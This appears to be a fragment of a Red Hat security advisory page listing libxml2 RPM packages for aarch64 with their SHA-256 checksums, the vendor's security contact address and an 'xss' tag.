libxml2-devel-2.9.7-15.el8.aarch64.rpm

SHA-256: f9ba41ccbf1dbe2f42f41a1fd8703cde6d392c3bfc2dfa24f0f99061602e8496

python3-libxml2-2.9.7-15.el8.aarch64.rpm

SHA-256: a22e3d5c1521526eafbab591f6349b59c3cb65c3e810ce86c09f496961c4c741

python3-libxml2-debuginfo-2.9.7-15.el8.aarch64.rpm

SHA-256: 34724cb0f89ff97f79819ae8532dcffc48a8920ae90f62bf1aded393815ccbd3

python3-libxml2-debuginfo-2.9.7-15.el8.aarch64.rpm

SHA-256: 34724cb0f89ff97f79819ae8532dcffc48a8920ae90f62bf1aded393815ccbd3

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Tag

#xss